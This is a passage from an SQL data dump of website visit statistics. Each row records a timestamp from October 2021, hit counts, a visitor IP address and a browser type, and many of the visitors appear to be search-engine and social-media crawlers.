0,'113.96.250.18','other'),(559004,1634569258,1,1,0,0,'113.96.250.18','chrome'),(559005,1634569763,1,1,0,0,'92.118.160.17','other'),(559006,1634573920,1,1,0,0,'66.249.66.199','chrome'),(559007,1634574856,1,1,0,0,'23.146.241.237','firefox'),(559008,1634577927,1,1,0,0,'66.249.66.85','chrome'),(559009,1634589105,1,1,0,0,'92.118.160.9','other'),(559010,1634589742,1,1,0,0,'66.249.66.158','chrome'),(559011,1634589801,1,0,1,0,'66.249.66.197',''),(559012,1634592060,1,1,0,0,'113.96.250.18','other'),(559013,1634604932,1,1,0,0,'113.96.250.18','chrome'),(559014,1634611305,1,1,0,0,'66.249.66.199','chrome'),(559015,1634614171,1,0,1,0,'66.249.66.158',''),(559016,1634621879,1,0,1,0,'66.249.66.85',''),(559017,1634622830,1,1,0,0,'113.96.250.18','chrome'),(559018,1634623328,1,1,0,0,'113.96.250.18','firefox'),(559019,1634626016,2,2,0,0,'113.96.250.18','other'),(559020,1634631147,1,1,0,0,'95.108.213.18','other'),(559021,1634631815,1,1,0,0,'173.252.111.25','other'),(559022,1634639587,2,2,0,0,'113.96.250.18','chrome'),(559023,1634643243,1,1,0,0,'42.236.10.78','chrome'),(559024,1634643316,3,3,0,0,'27.115.124.38','chrome'),(559025,1634644240,1,1,0,0,'113.96.250.18','opera'),(559026,1634647518,1,1,0,0,'113.96.250.18','other'),(559027,1634648378,2,1,1,0,'66.249.66.86',''),(559028,1634649498,1,1,0,0,'176.31.28.239','other'),(559029,1634649499,1,1,0,0,'176.31.28.239','chrome'),(559030,1634649761,1,0,1,0,'66.249.66.85',''),(559031,1634654745,11,11,0,0,'18.223.23.40','chrome'),(559032,1634655369,1,1,0,0,'95.108.213.18','other'),(559033,1634657770,1,1,0,0,'113.96.250.18','chrome'),(559034,1634663437,2,2,0,0,'113.96.250.18','chrome'),(559035,1634663636,1,1,0,0,'185.237.217.11','chrome'),(559036,1634664359,1,1,0,0,'173.252.111.13','other'),(559037,1634664360,1,1,0,0,'173.252.111.120','other'),(559039,1634664361,1,1,0,0,'173.252.111.4','other'),(559040,1634664530,1,1,0,0,'66.220.149.4','other'),(559042,1634664531,1,1,0,0,'173.252.111.9','other'),(559043,1634664549,1,1,0,0,'91.196.178.141','chrome'),(559044,1634664594,1,1,0,0,'31.13.127.34','other'),(559045,1634664632,1,1,0,0,'91.196.178.168','chrome'),(559046,1634664709,1,1,0,0,'91.196.121.135','chrome'),(559047,1634664715,1,1,0,0,'185.237.217.13','chrome'),(559048,1634664716,1,1,0,0,'185.237.217.11','chrome'),(559049,1634664733,1,1,0,0,'46.211.31.44','chrome'),(559050,1634664753,1,1,0,0,'46.211.53.142','chrome'),(559051,1634664943,1,1,0,0,'91.196.178.46','chrome'),(559052,1634665071,1,1,0,0,'46.201.112.63','chrome'),(559053,1634665074,1,1,0,0,'91.196.178.35','chrome'),(559054,1634665087,2,2,0,0,'91.196.178.6','chrome'),(559055,1634665152,1,1,0,0,'91.196.121.134','chrome'),(559056,1634665155,2,2,0,0,'46.211.63.104','chrome'),(559057,1634665310,1,1,0,0,'91.196.178.11','other'),(559058,1634665331,1,1,0,0,'185.237.217.22','chrome'),(559059,1634665444,1,1,0,0,'5.248.222.181','chrome'),(559060,1634665459,1,1,0,0,'185.237.217.14','chrome'),(559061,1634665496,1,1,0,0,'91.196.178.202','chrome'),(559062,1634665581,1,1,0,0,'93.73.125.185','chrome'),(559063,1634665644,1,1,0,0,'91.196.178.197','chrome'),(559064,1634665674,1,1,0,0,'185.237.217.11','chrome'),(559065,1634665768,1,1,0,0,'185.237.217.18','chrome'),(559066,1634665811,1,1,0,0,'91.196.178.221','chrome'),(559067,1634665968,1,1,0,0,'128.124.185.10','chrome'),(559068,1634666015,1,1,0,0,'91.196.178.3','chrome'),(559069,1634666190,1,1,0,0,'37.73.107.233','chrome'),(559070,1634666234,1,1,0,0,'185.237.217.5','chrome'),(559071,1634666277,1,1,0,0,'185.237.217.15','chrome'),(559072,1634666311,1,1,0,0,'91.196.178.195','chrome'),(559073,1634666403,1,1,0,0,'91.196.178.129','chrome'),(559074,1634666418,1,1,0,0,'46.211.14.27','chrome'),(559075,1634666458,1,1,0,0,'185.237.217.29','chrome'),(559076,1634666468,1,1,0,0,'46.211.53.188','chrome'),(559077,1634666603,1,1,0,0,'91.196.178.166','chrome'),(559078,1634666675,1,1,0,0,'91.196.178.133','chrome'),(559079,1634666758,1,1,0,0,'46.211.77.170','chrome'),(559080,1634666806,1,1,0,0,'91.196.178.132','chrome'),(559081,1634666967,1,1,0,0,'91.196.178.142','chrome'),(559082,1634667035,1,1,0,0,'185.237.217.14','chrome'),(559083,1634667086,1,1,0,0,'91.196.178.211','chrome'),(559084,1634667116,1,1,0,0,'91.196.178.170','chrome'),(559085,1634667168,1,1,0,0,'46.96.181.198','other'),(559086,1634667180,1,1,0,0,'185.237.217.13','other'),(559087,1634667185,1,1,0,0,'91.196.178.217','chrome'),(559088,1634667418,1,1,0,0,'185.237.217.21','chrome'),(559089,1634667425,1,1,0,0,'91.196.178.30','chrome'),(559090,1634667431,1,1,0,0,'91.196.178.188','chrome'),(559091,1634667438,1,1,0,0,'185.237.217.4','chrome'),(559092,1634667491,1,1,0,0,'185.237.217.16','chrome'),(559093,1634667538,1,1,0,0,'178.133.148.24','chrome'),(559094,1634667559,1,1,0,0,'37.53.228.127','chrome'),(559095,1634667616,1,1,0,0,'91.196.178.213','chrome'),(559096,1634667639,1,1,0,0,'46.211.44.156','chrome'),(559097,1634667641,2,2,0,0,'91.196.178.221','other'),(559098,1634667739,1,1,0,0,'185.237.217.24','chrome'),(559099,1634667742,1,1,0,0,'185.8.41.195','other'),(559100,1634667868,1,1,0,0,'91.196.178.56','chrome'),(559101,1634667970,1,1,0,0,'91.196.178.206','chrome'),(559102,1634667975,1,1,0,0,'91.196.178.180','chrome'),(559103,1634667984,1,1,0,0,'91.196.178.199','chrome'),(559104,1634668017,1,1,0,0,'91.196.178.25','chrome'),(559105,1634668153,1,1,0,0,'37.73.155.14','chrome'),(559106,1634668321,1,1,0,0,'85.207.44.3','chrome'),(559108,1634668323,1,1,0,0,'94.153.74.5','chrome'),(559109,1634668430,1,1,0,0,'94.153.48.72','chrome'),(559110,1634668460,1,1,0,0,'94.153.54.124','chrome'),(559111,1634668619,1,1,0,0,'91.196.178.153','chrome'),(559112,1634668756,1,1,0,0,'91.196.178.141','chrome'),(559113,1634668805,1,1,0,0,'185.237.217.8','chrome'),(559114,1634668816,1,1,0,0,'178.92.73.193','chrome'),(559115,1634668837,1,1,0,0,'91.196.178.194','chrome'),(559116,1634668852,1,1,0,0,'91.196.178.217','chrome'),(559117,1634668922,1,1,0,0,'66.249.66.86','chrome'),(559118,1634668966,1,1,0,0,'185.237.217.24','chrome'),(559119,1634668980,1,1,0,0,'94.153.5.71','chrome'),(559121,1634668982,1,1,0,0,'46.211.55.81','chrome'),(559122,1634669006,1,1,0,0,'178.133.245.24','chrome'),(559123,1634669056,1,1,0,0,'91.196.178.35','chrome'),(559124,1634669077,1,1,0,0,'185.237.217.11','chrome'),(559125,1634669212,1,1,0,0,'173.252.111.16','other'),(559126,1634669213,1,1,0,0,'173.252.111.24','other'),(559127,1634669223,1,1,0,0,'173.252.111.10','other'),(559128,1634669225,1,1,0,0,'173.252.111.1','other'),(559129,1634669235,1,1,0,0,'91.196.178.162','chrome'),(559130,1634669319,1,1,0,0,'91.196.178.221','chrome'),(559131,1634669461,1,1,0,0,'91.196.178.212','chrome'),(559132,1634669534,1,1,0,0,'91.196.178.198','chrome'),(559133,1634669737,1,1,0,0,'91.196.178.13','chrome'),(559134,1634669755,2,2,0,0,'91.196.178.139','chrome'),(559135,1634669771,1,1,0,0,'37.52.18.83','chrome'),(559136,1634669946,1,1,0,0,'82.145.210.243','other'),(559137,1634670021,1,1,0,0,'91.196.178.133','other'),(559138,1634670102,2,2,0,0,'185.237.217.7','chrome'),(559139,1634670112,1,1,0,0,'91.196.178.132','chrome'),(559140,1634670169,2,2,0,0,'95.134.203.210','chrome'),(559141,1634670226,1,1,0,0,'91.196.178.132','other'),(559142,1634670246,1,1,0,0,'91.196.178.15','chrome'),(559143,1634670339,1,1,0,0,'37.73.76.146','chrome'),(559144,1634670353,1,1,0,0,'113.96.250.18','other'),(559145,1634670354,1,1,0,0,'113.96.250.18','opera'),(559146,1634670399,1,1,0,0,'91.196.178.185','chrome'),(559147,1634670499,1,1,0,0,'46.211.49.46','chrome'),(559148,1634670953,1,1,0,0,'66.249.66.7','chrome'),(559149,1634670968,1,1,0,0,'91.196.178.157','chrome'),(559150,1634671096,1,1,0,0,'91.196.178.113','chrome'),(559151,1634671476,1,1,0,0,'91.196.178.28','chrome'),(559152,1634671606,1,1,0,0,'66.220.149.32','other'),(559153,1634671665,1,1,0,0,'91.196.178.176','chrome'),(559154,1634671831,1,1,0,0,'91.196.178.144','chrome'),(559155,1634672033,1,1,0,0,'91.196.178.50','chrome'),(559156,1634672133,1,1,0,0,'91.196.178.210','chrome'),(559157,1634672154,1,1,0,0,'178.133.168.51','chrome'),(559158,1634672216,1,1,0,0,'185.237.217.19','chrome'),(559159,1634672271,1,1,0,0,'91.196.178.57','chrome'),(559160,1634672478,1,1,0,0,'185.237.217.11','chrome'),(559161,1634672512,1,1,0,0,'91.196.178.214','chrome'),(559162,1634672693,1,1,0,0,'185.237.217.0','other'),(559163,1634672808,1,1,0,0,'91.196.176.131','chrome'),(559164,1634673035,1,1,0,0,'91.196.178.193','chrome'),(559165,1634673195,1,1,0,0,'91.196.178.106','other'),(559166,1634673288,1,1,0,0,'91.196.178.203','chrome'),(559167,1634673382,1,1,0,0,'173.252.111.12','other'),(559168,1634673383,1,1,0,0,'173.252.111.119','other'),(559169,1634673624,1,1,0,0,'91.196.178.187','chrome'),(559170,1634673824,1,1,0,0,'185.237.217.14','chrome'),(559171,1634673967,1,1,0,0,'37.73.0.88','chrome'),(559172,1634674243,1,1,0,0,'185.237.217.19','chrome'),(559173,1634674436,1,1,0,0,'91.196.178.139','chrome'),(559174,1634674791,1,1,0,0,'185.237.217.10','chrome'),(559175,1634676291,1,1,0,0,'185.237.217.8','chrome'),(559176,1634676388,1,1,0,0,'185.237.217.1','chrome'),(559177,1634676909,1,1,0,0,'37.55.56.71','chrome'),(559178,1634677177,1,1,0,0,'85.76.18.137','chrome'),(559179,1634677812,1,1,0,0,'94.45.140.2','other'),(559180,1634679372,1,1,0,0,'86.111.89.130','chrome'),(559181,1634680925,1,1,0,0,'185.237.217.2','chrome'),(559182,1634681136,1,1,0,0,'46.135.9.205','chrome'),(559183,1634681197,1,1,0,0,'95.108.213.18','other'),(559184,1634685528,1,1,0,0,'176.36.67.191','other'),(559185,1634686101,1,1,0,0,'128.124.202.7','chrome'),(559186,1634686872,1,1,0,0,'91.196.178.139','chrome'),(559187,1634688607,1,1,0,0,'113.96.250.18','other'),(559188,1634688667,1,1,0,0,'66.249.66.159','chrome'),(559189,1634689910,1,0,1,0,'66.249.66.197',''),(559190,1634690840,2,1,1,0,'66.249.66.201',''),(559191,1634694084,1,1,0,0,'69.63.189.2','other'),(559192,1634694106,1,1,0,0,'188.163.16.223','other'),(559193,1634694118,1,1,0,0,'173.252.107.9','other'),(559194,1634694900,1,1,0,0,'176.36.50.232','chrome'),(559195,1634695626,1,1,0,0,'46.133.29.58','chrome'),(559196,1634695657,1,1,0,0,'98.220.76.54','chrome'),(559197,1634695782,1,1,0,0,'5.255.253.123','other'),(559198,1634698124,1,1,0,0,'66.249.66.129','chrome'),(559199,1634700479,1,1,0,0,'66.249.66.129','chrome'),(559200,1634701246,1,1,0,0,'46.211.74.143','other'),(559201,1634701278,1,1,0,0,'91.196.178.61','chrome'),(559202,1634702200,1,1,0,0,'185.237.217.21','chrome'),(559203,1634702258,1,1,0,0,'185.237.217.31','chrome'),(559204,1634702596,1,1,0,0,'91.196.178.170','chrome'),(559205,1634702639,1,1,0,0,'46.211.70.33','chrome'),(559206,1634703136,1,1,0,0,'178.95.156.206','chrome'),(559207,1634703468,1,1,0,0,'91.196.178.196','other'),(559208,1634704197,1,1,0,0,'45.129.18.95','chrome'),(559209,1634704826,1,1,0,0,'185.237.217.1','chrome'),(559210,1634705379,1,1,0,0,'91.196.178.207','chrome'),(559211,1634705515,1,0,1,0,'66.249.66.87',''),(559212,1634705673,1,1,0,0,'91.196.177.158','chrome'),(559213,1634705721,1,1,0,0,'66.249.66.158','chrome'),(559214,1634705961,1,1,0,0,'185.237.217.11','chrome'),(559215,1634706328,1,1,0,0,'31.13.127.117','other'),(559216,1634706346,1,1,0,0,'185.237.217.19','other'),(559217,1634706810,1,1,0,0,'66.249.66.86','chrome'),(559218,1634706903,1,1,0,0,'178.133.253.159','chrome'),(559219,1634706967,1,0,1,0,'66.249.66.85',''),(559220,1634707121,1,1,0,0,'113.96.250.18','chrome'),(559221,1634707307,1,1,0,0,'91.196.178.50','chrome'),(559222,1634707317,1,1,0,0,'91.196.178.169','chrome'),(559223,1634707920,1,1,0,0,'94.153.22.59','chrome'),(559224,1634708351,1,1,0,0,'88.155.110.12','chrome'),(559225,1634708660,1,1,0,0,'91.196.178.109','chrome'),(559226,1634708940,1,1,0,0,'91.196.178.193','chrome'),(559227,1634710365,1,1,0,0,'91.196.178.185','chrome'),(559228,1634710410,1,1,0,0,'46.211.152.162','chrome'),(559229,1634711156,1,1,0,0,'37.73.7.139','chrome'),(559230,1634711496,1,1,0,0,'66.249.66.86','chrome'),(559231,1634711527,1,1,0,0,'91.196.178.121','chrome'),(559232,1634711674,1,1,0,0,'94.153.66.233','chrome'),(559233,1634711858,1,1,0,0,'46.211.78.97','chrome'),(559234,1634712258,1,1,0,0,'113.96.250.18','msie'),(559235,1634712372,1,1,0,0,'46.211.78.73','chrome'),(559236,1634713873,1,1,0,0,'20.105.205.235','other'),(559237,1634714935,1,1,0,0,'91.196.179.29','chrome'),(559238,1634716562,1,1,0,0,'91.196.178.176','chrome'),(559239,1634716699,1,1,0,0,'173.252.111.10','other'),(559240,1634716700,1,1,0,0,'173.252.111.7','other'),(559241,1634717281,1,1,0,0,'185.237.217.25','other'),(559242,1634717692,1,1,0,0,'46.211.166.214','chrome'),(559243,1634717875,1,1,0,0,'91.196.178.166','chrome'),(559244,1634718309,1,1,0,0,'178.133.142.20','chrome'),(559245,1634718350,1,1,0,0,'91.196.121.135','chrome'),(559246,1634718726,1,0,1,0,'113.96.250.18',''),(559247,1634720190,1,1,0,0,'178.32.184.2','other'),(559248,1634720191,1,1,0,0,'178.32.184.2','chrome'),(559249,1634720298,1,1,0,0,'46.211.0.80','chrome'),(559250,1634720787,1,1,0,0,'91.196.178.214','chrome'),(559251,1634721056,1,1,0,0,'46.211.74.120','other'),(559252,1634721423,1,1,0,0,'91.196.178.146','chrome'),(559253,1634721763,1,1,0,0,'213.3.35.75','chrome'),(559254,1634721863,1,1,0,0,'46.96.157.126','chrome'),(559255,1634721866,1,1,0,0,'178.133.37.143','chrome'),(559256,1634723559,1,1,0,0,'91.196.178.174','chrome'),(559257,1634723708,1,1,0,0,'5.196.141.196','chrome'),(559258,1634723709,1,1,0,0,'5.196.141.196','other'),(559259,1634723761,1,1,0,0,'91.196.178.61','chrome'),(559260,1634724992,1,1,0,0,'37.55.227.131','chrome'),(559261,1634725151,1,1,0,0,'94.153.2.29','chrome'),(559262,1634726139,1,1,0,0,'69.171.251.2','other'),(559263,1634727751,1,1,0,0,'46.96.178.62','chrome'),(559264,1634728058,1,1,0,0,'147.135.249.229','chrome'),(559265,1634728059,1,1,0,0,'147.135.249.229','other'),(559266,1634729261,1,1,0,0,'176.104.5.116','chrome'),(559267,1634729522,1,1,0,0,'78.111.185.42','chrome'),(559268,1634729694,1,1,0,0,'113.96.250.18','chrome'),(559269,1634731843,1,1,0,0,'91.196.178.171','chrome'),(559270,1634731992,1,1,0,0,'46.211.47.114','chrome'),(559271,1634732094,1,1,0,0,'185.237.217.9','chrome'),(559272,1634732288,1,0,1,0,'66.249.66.5',''),(559273,1634732355,2,0,2,0,'66.249.66.86',''),(559274,1634734082,2,2,0,0,'113.96.250.18','chrome'),(559275,1634734501,1,1,0,0,'128.124.81.174','chrome'),(559276,1634735313,1,1,0,0,'91.196.178.221','other'),(559277,1634737322,1,1,0,0,'91.196.178.173','chrome'),(559278,1634737323,1,1,0,0,'31.13.127.37','other'),(559281,1634737324,2,2,0,0,'31.13.127.29','other'),(559284,1634737325,1,1,0,0,'31.13.127.28','other'),(559285,1634738972,2,2,0,0,'178.32.184.2','chrome'),(559286,1634741185,1,1,0,0,'46.211.75.212','other'),(559287,1634743790,1,0,1,0,'66.249.66.85',''),(559288,1634744224,1,1,0,0,'185.30.202.112','chrome'),(559289,1634744628,1,1,0,0,'185.237.217.15','chrome'),(559290,1634746664,1,1,0,0,'91.196.178.28','chrome'),(559291,1634747947,1,1,0,0,'91.196.121.135','chrome'),(559292,1634748140,1,1,0,0,'193.93.79.173','other'),(559293,1634748920,1,1,0,0,'185.237.217.15','chrome'),(559294,1634749363,1,1,0,0,'91.196.178.36','chrome'),(559295,1634749881,1,1,0,0,'91.196.178.175','other'),(559296,1634750233,1,1,0,0,'185.237.217.2','chrome'),(559297,1634750305,1,1,0,0,'128.124.240.26','chrome'),(559298,1634750690,1,1,0,0,'91.196.178.141','chrome'),(559299,1634750867,1,1,0,0,'91.196.178.170','chrome'),(559300,1634752551,1,1,0,0,'91.196.178.162','chrome'),(559301,1634753180,1,1,0,0,'185.237.217.16','chrome'),(559302,1634754959,1,1,0,0,'91.196.178.208','chrome'),(559303,1634755191,1,1,0,0,'113.96.250.18','other'),(559304,1634755227,1,1,0,0,'178.95.156.130','chrome'),(559305,1634755497,1,1,0,0,'66.249.66.159','chrome'),(559306,1634756740,1,1,0,0,'66.249.66.7','chrome'),(559307,1634757137,1,1,0,0,'178.133.56.191','chrome'),(559308,1634757790,1,1,0,0,'185.237.217.1','chrome'),(559309,1634758209,1,1,0,0,'91.196.178.10','chrome'),(559310,1634758316,2,2,0,0,'31.13.127.29','other'),(559311,1634758321,1,1,0,0,'31.13.127.20','other'),(559312,1634758743,1,1,0,0,'23.146.241.237','firefox'),(559313,1634758989,1,1,0,0,'91.196.178.7','chrome'),(559314,1634759215,1,1,0,0,'113.96.250.18','chrome'),(559315,1634759372,1,1,0,0,'91.196.178.170','chrome'),(559316,1634759768,3,3,0,0,'113.96.250.18','other'),(559317,1634760381,1,1,0,0,'113.96.250.18','chrome'),(559318,1634760438,1,1,0,0,'66.249.66.158','chrome'),(559319,1634762660,1,1,0,0,'185.237.217.3','chrome'),(559320,1634763012,1,1,0,0,'91.196.178.59','chrome'),(559321,1634766264,1,1,0,0,'113.96.250.18','chrome'),(559322,1634770828,1,1,0,0,'113.96.250.18','chrome'),(559323,1634773272,1,1,0,0,'113.96.250.18','other'),(559324,1634773470,1,1,0,0,'113.96.250.18','opera'),(559325,1634777157,1,1,0,0,'113.96.250.18','chrome'),(559326,1634778493,1,1,0,0,'113.96.250.18','chrome'),(559327,1634786258,1,1,0,0,'113.96.250.18','chrome'),(559328,1634787375,1,1,0,0,'91.196.178.33','chrome'),(559329,1634789189,1,1,0,0,'113.96.250.18','chrome'),(559330,1634789540,1,1,0,0,'66.249.66.201','chrome'),(559331,1634790828,1,1,0,0,'124.126.78.162','chrome'),(559332,1634792052,1,1,0,0,'178.133.8.67','chrome'),(559333,1634793292,1,1,0,0,'91.196.178.129','chrome'),(559334,1634794708,1,1,0,0,'95.134.220.67','chrome'),(559335,1634796716,1,1,0,0,'95.135.212.155','chrome'),(559336,1634799011,1,1,0,0,'113.96.250.18','chrome'),(559337,1634801718,1,1,0,0,'113.96.250.18','firefox'),(559338,1634801719,2,2,0,0,'113.96.250.18','other'),(559339,1634802486,1,1,0,0,'113.96.250.18','chrome'),(559340,1634802739,1,1,0,0,'91.196.178.135','chrome'),(559341,1634804560,1,1,0,0,'185.237.217.2','chrome'),(559342,1634804563,1,1,0,0,'69.171.249.24','other'),(559343,1634804564,1,1,0,0,'69.171.249.7','other'),(559347,1634804565,1,1,0,0,'69.171.249.14','other'),(559348,1634808463,1,1,0,0,'87.250.224.49','other'),(559349,1634808518,1,1,0,0,'113.96.250.18','other'),(559350,1634808523,1,1,0,0,'94.153.48.192','chrome'),(559351,1634814807,1,1,0,0,'66.249.66.87','chrome'),(559352,1634816856,1,1,0,0,'37.73.2.151','chrome'),(559353,1634817637,1,1,0,0,'113.96.250.18','other'),(559354,1634820058,1,1,0,0,'113.96.250.18','other'),(559355,1634821107,1,1,0,0,'91.196.178.117','chrome'),(559356,1634822383,1,1,0,0,'91.196.178.169','chrome'),(559357,1634825118,1,1,0,0,'94.153.72.235','chrome'),(559358,1634826601,1,1,0,0,'185.237.217.31','chrome'),(559359,1634831244,2,0,2,0,'66.249.66.85',''),(559360,1634833755,1,1,0,0,'95.134.113.226','chrome'),(559361,1634836960,1,1,0,0,'113.96.250.18','msie'),(559362,1634837280,1,1,0,0,'113.96.250.18','chrome'),(559363,1634837545,1,0,1,0,'66.249.66.129',''),(559364,1634838394,1,1,0,0,'113.96.250.18','other'),(559365,1634842524,1,1,0,0,'94.153.6.195','other'),(559366,1634843588,1,1,0,0,'94.153.59.246','chrome'),(559367,1634848573,1,1,0,0,'91.196.178.178','chrome'),(559368,1634860543,2,2,0,0,'23.94.80.175','chrome'),(559369,1634868439,1,1,0,0,'113.96.250.18','other'),(559370,1634871459,1,1,0,0,'185.237.217.15','chrome'),(559371,1634871462,2,2,0,0,'31.13.127.24','other'),(559372,1634871463,1,1,0,0,'31.13.127.116','other'),(559374,1634871464,1,1,0,0,'31.13.127.118','other'),(559375,1634883006,1,1,0,0,'91.196.178.130','chrome'),(559376,1634890172,1,1,0,0,'195.38.8.132','chrome'),(559377,1634893589,1,1,0,0,'46.211.48.3','chrome'),(559378,1634894191,1,1,0,0,'87.250.224.49','other'),(559379,1634896381,1,1,0,0,'31.13.115.3','other'),(559380,1634899167,1,1,0,0,'5.45.207.154','other'),(559381,1634899234,2,2,0,0,'113.96.250.18','chrome'),(559382,1634901003,1,1,0,0,'113.96.250.18','chrome'),(559383,1634901676,1,1,0,0,'94.153.76.195','chrome'),(559384,1634902514,1,1,0,0,'5.45.207.120','other'),(559385,1634904255,1,1,0,0,'113.96.250.18','chrome'),(559386,1634912269,1,1,0,0,'173.252.79.24','other'),(559388,1634912608,1,1,0,0,'113.96.250.18','chrome'),(559389,1634916724,1,1,0,0,'91.196.178.194','chrome'),(559390,1634919137,1,1,0,0,'66.220.149.113','other'),(559391,1634919389,1,1,0,0,'91.196.178.146','chrome'),(559392,1634919392,1,1,0,0,'173.252.79.2','other'),(559393,1634919393,1,1,0,0,'173.252.79.27','other'),(559396,1634919394,1,1,0,0,'173.252.79.22','other'),(559398,1634919475,1,0,1,0,'66.249.66.85',''),(559399,1634919799,4,4,0,0,'37.187.110.9','other'),(559400,1634920450,1,1,0,0,'95.108.213.18','other'),(559401,1634921288,1,1,0,0,'51.158.98.24','other'),(559402,1634922166,1,1,0,0,'178.133.72.113','other'),(559403,1634923000,1,1,0,0,'91.196.178.211','chrome'),(559404,1634925739,1,1,0,0,'185.11.29.217','chrome'),(559405,1634931197,1,1,0,0,'113.96.250.18','other'),(559406,1634931847,1,1,0,0,'113.96.250.18','chrome'),(559407,1634932803,1,1,0,0,'113.96.250.18','chrome'),(559408,1634934083,1,1,0,0,'94.153.16.38','other'),(559409,1634938481,1,1,0,0,'113.96.250.18','chrome'),(559410,1634938485,2,2,0,0,'113.96.250.18','other'),(559411,1634945286,1,1,0,0,'207.46.13.114','other'),(559412,1634947802,1,1,0,0,'113.96.250.18','chrome'),(559413,1634956509,2,2,0,0,'113.96.250.18','chrome'),(559414,1634962115,1,1,0,0,'185.237.217.3','chrome'),(559415,1634966396,1,1,0,0,'113.96.250.18','other'),(559416,1634968231,1,1,0,0,'69.171.231.1','other'),(559417,1634972065,1,1,0,0,'113.96.250.18','chrome'),(559418,1634975617,2,2,0,0,'113.96.250.18','chrome'),(559419,1634976993,1,1,0,0,'113.96.250.18','msie'),(559420,1634977786,1,1,0,0,'173.252.87.3','other'),(559421,1634980614,1,0,1,0,'66.249.66.85',''),(559422,1634983809,1,1,0,0,'46.96.132.122','other'),(559423,1634984862,3,3,0,0,'52.188.109.195','other'),(559424,1634988085,1,1,0,0,'91.196.178.141','firefox'),(559425,1634990874,2,2,0,0,'113.96.250.18','chrome'),(559426,1634998352,7,7,0,0,'54.184.48.147','firefox'),(559427,1635002129,1,1,0,0,'113.96.250.18','chrome'),(559428,1635002241,1,1,0,0,'95.108.213.18','other'),(559429,1635004453,1,1,0,0,'66.249.66.86','chrome'),(559430,1635008556,1,1,0,0,'113.96.250.18','chrome'),(559431,1635010625,1,1,0,0,'157.55.39.153','other'),(559432,1635014081,1,1,0,0,'113.96.250.18','other'),(559433,1635014396,2,0,2,0,'66.249.66.85',''),(559434,1635015608,1,1,0,0,'95.108.213.18','other'),(559435,1635016700,1,1,0,0,'113.96.250.18','chrome'),(559436,1635017875,1,1,0,0,'37.73.166.40','chrome'),(559437,1635022807,1,1,0,0,'173.252.111.118','other'),(559438,1635025236,1,1,0,0,'66.249.66.197','chrome'),(559439,1635025856,1,1,0,0,'157.55.39.22','other'),(559440,1635028190,2,2,0,0,'77.75.145.164','chrome'),(559441,1635029297,1,1,0,0,'113.96.250.18','chrome'),(559442,1635032221,1,1,0,0,'113.96.250.18','firefox'),(559443,1635032222,1,1,0,0,'113.96.250.18','chrome'),(559444,1635039394,1,1,0,0,'147.135.206.116','chrome'),(559446,1635042569,1,1,0,0,'113.96.250.18','other'),(559447,1635046024,1,1,0,0,'185.237.217.11','chrome'),(559448,1635050243,1,1,0,0,'66.249.66.5','chrome'),(559449,1635057579,1,1,0,0,'37.73.146.124','chrome'),(559450,1635067297,2,2,0,0,'113.96.250.18','chrome'),(559451,1635068506,1,1,0,0,'113.96.250.18','firefox'),(559452,1635072941,1,1,0,0,'157.55.39.188','other'),(559453,1635080341,1,1,0,0,'113.96.250.18','chrome'),(559454,1635082342,1,1,0,0,'37.73.48.229','chrome'),(559455,1635082761,2,2,0,0,'5.196.141.202','chrome'),(559456,1635084040,1,1,0,0,'91.196.178.200','chrome'),(559457,1635092122,1,1,0,0,'113.96.250.18','chrome'),(559458,1635093039,1,1,0,0,'113.96.250.18','other'),(559459,1635100805,1,0,1,0,'66.249.66.85',''),(559460,1635100806,1,0,1,0,'66.249.66.5',''),(559461,1635101082,1,1,0,0,'46.133.166.5','chrome'),(559462,1635101115,1,1,0,0,'173.252.111.120','other'),(559464,1635101116,1,1,0,0,'173.252.111.5','other'),(559468,1635101357,1,1,0,0,'113.96.250.18','other'),(559469,1635104118,1,1,0,0,'66.249.66.9','chrome'),(559470,1635105681,1,1,0,0,'66.249.66.129','chrome'),(559471,1635106390,1,1,0,0,'113.96.250.18','chrome'),(559472,1635113132,1,1,0,0,'113.96.250.18','chrome'),(559473,1635113896,1,1,0,0,'51.15.205.3','other'),(559474,1635123181,1,1,0,0,'113.96.250.18','chrome'),(559475,1635131102,1,1,0,0,'113.96.250.18','other'),(559476,1635133042,1,1,0,0,'66.249.66.199','chrome'),(559477,1635135941,1,1,0,0,'66.249.66.201','chrome'),(559478,1635137718,1,1,0,0,'46.211.47.124','other'),(559479,1635148929,1,1,0,0,'207.46.13.151','other'),(559480,1635152474,1,1,0,0,'173.252.87.21','other'),(559481,1635168686,1,1,0,0,'95.108.213.18','other'),(559482,1635169452,1,1,0,0,'20.102.55.130','chrome'),(559483,1635171447,1,1,0,0,'37.187.141.11','firefox'),(559484,1635172816,1,1,0,0,'66.249.66.86','chrome'),(559485,1635176528,1,1,0,0,'37.73.32.37','chrome'),(559486,1635179019,1,0,1,0,'66.249.66.197',''),(559487,1635187047,1,1,0,0,'95.108.213.18','chrome'),(559488,1635187225,1,1,0,0,'69.171.249.9','other'),(559489,1635187227,1,1,0,0,'31.13.127.25','other'),(559490,1635187233,1,0,1,0,'66.249.66.215',''),(559491,1635207732,1,1,0,0,'157.55.39.62','other'),(559492,1635223167,2,2,0,0,'13.59.131.134','other'),(559493,1635234270,1,1,0,0,'88.155.51.197','chrome'),(559494,1635241848,1,1,0,0,'5.255.253.156','other'),(559495,1635245875,1,1,0,0,'88.155.51.197','chrome'),(559496,1635248497,2,2,0,0,'52.186.69.98','firefox'),(559497,1635252614,1,1,0,0,'66.249.66.86','chrome'),(559498,1635259559,1,1,0,0,'88.155.51.197','chrome'),(559499,1635262880,1,1,0,0,'207.46.13.79','other'),(559500,1635266221,1,1,0,0,'95.108.213.18','other'),(559501,1635272335,1,0,1,0,'66.249.66.86',''),(559502,1635272724,1,1,0,0,'66.249.66.87','chrome'),(559503,1635273595,1,0,1,0,'66.249.66.85',''),(559504,1635274075,1,1,0,0,'107.150.63.171','chrome'),(559505,1635274373,1,1,0,0,'66.249.66.84','chrome'),(559506,1635279361,1,0,1,0,'66.249.66.81',''),(559507,1635281081,1,1,0,0,'66.249.66.83','chrome'),(559508,1635283272,1,0,1,0,'66.249.66.85',''),(559509,1635285038,1,1,0,0,'66.249.66.159','chrome'),(559510,1635297651,1,1,0,0,'116.203.99.178','chrome'),(559511,1635301847,1,1,0,0,'66.249.66.158','chrome'),(559512,1635302839,1,1,0,0,'87.250.224.80','other'),(559513,1635305105,1,1,0,0,'66.249.66.9','chrome'),(559514,1635305278,1,1,0,0,'66.249.66.217','chrome'),(559515,1635307787,1,1,0,0,'23.148.145.196','firefox'),(559516,1635309703,1,1,0,0,'207.46.13.79','other'),(559517,1635321961,1,1,0,0,'94.153.10.205','chrome'),(559518,1635321963,1,1,0,0,'66.249.83.87','chrome'),(559519,1635323402,1,1,0